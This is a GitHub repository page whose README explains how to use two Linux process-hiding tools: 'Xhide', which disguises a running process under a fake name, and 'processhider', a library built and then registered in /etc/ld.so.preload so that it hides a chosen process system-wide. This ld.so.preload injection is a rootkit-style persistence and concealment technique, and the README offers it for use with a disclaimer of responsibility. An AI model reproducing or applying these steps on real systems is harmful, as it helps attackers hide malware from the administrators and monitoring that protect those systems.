Skip to content

HexaCuant/pro

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

pro

Xhide for linux

Usage : gcc -o xhide xhide.c

syntex : ./xhide -s "fake_process_name" -p test.pid ./Real_process

Disclaimer : Code taken from internet. Auther is not responsible for anything. Use it as per ur own discretion.

Processhider usage...

First edit processhider.c and enter ur process name

make gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl sudo mv libprocesshider.so /usr/local/lib/ echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

About

Xhide for linux

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 100.0%